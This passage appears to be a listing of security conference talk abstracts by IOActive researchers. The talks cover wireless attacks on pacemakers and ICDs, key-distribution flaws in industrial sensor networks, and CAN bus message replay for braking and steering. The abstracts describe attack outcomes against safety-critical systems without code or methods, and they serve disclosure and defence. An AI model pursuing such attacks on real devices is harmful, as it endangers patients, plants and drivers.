In 2006, approximately 350,000 pacemakers and 173,000 ICD’s (Implantable Cardioverter Defibrillators) were implanted in the US alone. 2006 was an important year; this is when the FDA began approving fully wireless-based devices. Today there are well over 3 million pacemakers and over 1.7 million ICDs in use.
In this talk, I will focus on the security of wireless implantable medical devices and discuss how these devices operate and communicate and the security shortcomings of the current protocols. I will reveal IOActive’s internal research software that uses a common bedside transmitter to scan for and interrogate individual medical implants. Finally, I will discuss techniques that manufacturers can implement to improve the security of these devices.

 

COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY
Who: Lucas Apa and Carlos Mario Penagos
Where & When: Black Hat USA, August 1st, 3:30pm

 

The evolution of wireless technologies has allowed industrial automation and control systems (IACS) to become strategic assets for companies that rely on processing plants and facilities in industries such as energy production, oil, gas, water, utilities, refining, and petrochemical distribution and processing. Effective wireless sensor networks have enabled these companies to reduce implementation, maintenance, and equipment costs and enhance personal safety by enabling new topologies for remote monitoring and administration in hazardous locations.
However, the manner in which sensor networks handle and control cryptographic keys is very different from the way in which they are handled in traditional business networks. Sensor networks involve large numbers of sensor nodes with limited hardware capabilities, so the distribution and revocation of keys is not a trivial task.
In this presentation, we will review the most commonly implemented key distribution schemes, their weaknesses, and how vendors can more effectively align their designs with key distribution solutions. We will also demonstrate some attacks that exploit key distribution vulnerabilities, which we recently discovered in every wireless device developed over the past few years by three leading industrial wireless automation solution providers. These devices are widely used by many energy, oil, water, nuclear, natural gas, and refined petroleum companies.
An untrusted user or group within a 40-mile range could read from and inject data into these devices using radio frequency (RF) transceivers. A remotely and wirelessly exploitable memory corruption bug could disable all the sensor nodes and forever shut down an entire facility. When sensors and transmitters are attacked, remote sensor measurements on which critical decisions are made can be modified. This can lead to unexpected, harmful, and dangerous consequences.

 

Adventures in Automotive Networks and Control Units
Who: Chris Valasek
Where & When: DefCon, August 2nd, 10:00am
Automotive computers, or Electronic Control Units (ECU), were originally introduced to help with fuel efficiency and emissions problems of the 1970s but evolved into integral parts of in-car entertainment, safety controls, and enhanced automotive functionality.
In this presentation, I will examine some controls in two modern automobiles from a security researcher’s point of view. I will first cover the requisite tools and software needed to analyze a Controller Area Network (CAN) bus. I will also demo software to show how data can be read and written to the CAN bus. Then I will show how certain proprietary messages can be replayed by a device hooked up to an OBD-II connection to perform critical car functionality, such as braking and steering. Finally, I will discuss aspects of reading and modifying the firmware of ECUs installed in today’s modern automobile.